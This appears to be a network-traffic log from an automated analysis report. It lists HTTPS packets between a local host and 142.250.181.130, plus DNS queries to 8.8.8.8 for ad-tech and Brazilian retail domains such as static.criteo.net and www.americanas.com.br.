                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.898302078 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.898361921 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.898381948 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.898428917 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.898700953 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.898776054 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.898834944 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.898885965 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.899547100 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.899602890 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.899713993 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.899769068 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.907962084 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.908020973 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.908202887 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.908260107 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.908392906 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.908444881 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.908519030 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.908571959 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.909220934 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.909274101 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.909660101 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.909715891 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927047014 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927103043 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927113056 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927124023 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927161932 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927161932 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927450895 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927500963 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927557945 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.927611113 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.928297043 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.928349972 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.929147959 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.929203033 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.929436922 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.929502964 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.929582119 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.929636002 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.930315971 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.930368900 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.931188107 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.931231976 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.931283951 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.931339979 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.932018995 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.932074070 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.936223984 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.936285973 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.936363935 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.936445951 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.936737061 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.936784029 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.936800003 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.936847925 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.937484026 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.937537909 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.938307047 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.938359976 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.946866035 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.946942091 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.946981907 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.947025061 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.947264910 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.947330952 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.948196888 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.948256969 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.948283911 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.948343039 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.948976040 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.949033022 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.961849928 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.961908102 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.962060928 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.962116957 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.962148905 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.962208986 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.963049889 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.963100910 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.963790894 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.963857889 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.963906050 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.963957071 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.977180958 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.977237940 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.978943110 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979002953 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979475975 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979522943 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979531050 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979546070 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979577065 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979607105 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979617119 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.979672909 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.991791964 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.991846085 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.992095947 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.992151022 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.992180109 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.992230892 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.993135929 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.993194103 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.993210077 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.993268967 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.993917942 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.993992090 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.994103909 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:16.994163036 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.005100012 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.005151987 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.005445957 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.005498886 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.005587101 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.005635023 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.006305933 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.006357908 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.006443024 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.006496906 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.019028902 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.019084930 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.019105911 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.019148111 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.019467115 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.019516945 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.019648075 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.019695044 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.020328999 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.020378113 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.020411015 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.020457983 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.032505989 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.032561064 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.032639027 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.032689095 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.033056021 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.033107996 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.033243895 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.033308029 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.033987999 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.034040928 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.034223080 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.034272909 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.041555882 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.041609049 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.041620970 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.041665077 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.041963100 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.042023897 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.042113066 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.042162895 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.043025970 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.043075085 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.043685913 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.043737888 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.054459095 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.054513931 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.054615021 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.054658890 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.055030107 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.055079937 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.055752039 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.055804968 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.055896044 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.055946112 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.056621075 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.056667089 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.066919088 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.066972017 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.067339897 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.067393064 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.067545891 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.067601919 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.068201065 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.068250895 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.068320036 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.068368912 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.079744101 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.079797983 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080161095 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080200911 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080210924 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080225945 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080250978 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080255032 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080282927 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080282927 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080296040 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080313921 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080337048 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080353975 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080377102 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080398083 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080445051 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.080492020 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.090374947 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.090429068 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.090440989 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.090492010 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.090914965 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.090971947 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.091033936 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.091090918 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.091605902 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.091662884 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.091762066 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.091823101 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.099993944 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.100052118 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.100107908 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.100164890 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.100441933 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.100498915 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.100608110 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.100661993 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101255894 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101319075 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101336956 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101355076 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101365089 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101399899 CET44349222142.250.181.130192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101423025 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101423025 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:17.101459026 CET49222443192.168.2.22142.250.181.130
                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                  Dec 23, 2024 10:26:51.726759911 CET5456253192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:26:51.974093914 CET53545628.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.070406914 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.077246904 CET5789353192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.080365896 CET5482153192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.095453978 CET5471953192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.097636938 CET4988153192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.213135004 CET53578938.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.257306099 CET5471953192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.325113058 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.325387001 CET6275153192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.373862982 CET4988153192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.577708006 CET53627518.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.940771103 CET5482153192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:36.241065025 CET5499853192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:36.374963045 CET53549988.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.575890064 CET5278153192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.593514919 CET6392653192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.845906973 CET53527818.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:58.846709967 CET53639268.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:07.555042982 CET6551053192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:07.824431896 CET53655108.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:07.824666023 CET6551053192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.092567921 CET53655108.8.8.8192.168.2.22
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.196494102 CET6551053192.168.2.228.8.8.8
                                                                                                                                                                                                                                  Dec 23, 2024 10:28:08.330168962 CET53655108.8.8.8192.168.2.22
                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                  Dec 23, 2024 10:26:51.726759911 CET192.168.2.228.8.8.80x2ccStandard query (0)static.criteo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.070406914 CET192.168.2.228.8.8.80x513Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.077246904 CET192.168.2.228.8.8.80x8e49Standard query (0)static.criteo.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.080365896 CET192.168.2.228.8.8.80xb78bStandard query (0)www.americanas.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.095453978 CET192.168.2.228.8.8.80x7aa8Standard query (0)images-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.097636938 CET192.168.2.228.8.8.80x45f7Standard query (0)statics-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.257306099 CET192.168.2.228.8.8.80x7aa8Standard query (0)images-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.325387001 CET192.168.2.228.8.8.80x513Standard query (0)securepubads.g.doubleclick.netA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.373862982 CET192.168.2.228.8.8.80x45f7Standard query (0)statics-americanas.b2w.ioA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:14.940771103 CET192.168.2.228.8.8.80xb78bStandard query (0)www.americanas.com.brA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                  Dec 23, 2024 10:27:36.241065025 CET192.168.2.228.8.8.80x17f0Standard query (0)static.criteo.netA (IP address)IN (0x0001)false
